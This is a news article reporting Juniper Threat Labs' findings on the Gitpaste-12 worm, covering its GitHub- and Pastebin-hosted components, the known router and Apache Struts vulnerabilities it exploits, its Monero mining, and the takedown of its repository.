Researchers at Juniper Threat Labs uncovered a new worm and botnet, which they named Gitpaste-12 because it uses GitHub and Pastebin to host component code and has at least 12 active attack modules.
The researchers said they discovered the Gitpaste-12 attacks on October 15 and reported the Pastebin URL and git repo, which was closed on Oct. 30, 2020. This should stop the propagation of the botnet, the researchers noted.
According to the report, the Gitpaste-12 botnet has 12 attack modules available, though the presence of test code for possible future modules suggests that the malware is still in development stage. At a present, Gitpaste-12 targets Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices.
To compromise targets the malware uses exploits for known vulnerabilities in various products, including Tenda and Huawei (CVE-2017-17215) routers, Realtek SDK (CVE-2014-8361), as well as Apache Struts (CVE-2017-5638) among others, and also attempts to brute force passwords.
“Immediately after compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet. The main shell script uploaded during the attack to the victim machine starts to download and execute other components of Gitpaste-12,” the report explains.
The malware then downloads and executes components from GitHub. Next, Gitpaste-12 prepares its target environment by disabling system defenses such as firewall rules and common threat prevention and monitoring software. The researchers discovered a script containing comments in the Chinese language and commands to block security tools. In one instance, commands disable cloud security agents, suggesting the threat actor meant to target public cloud infrastructure provided by Alibaba Cloud and Tencent.
The research team said that the malware’s functions also include an ability to mine Monero cryptocurrency and spread to other machines.
“No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization,” Juniper Threat Labs concluded.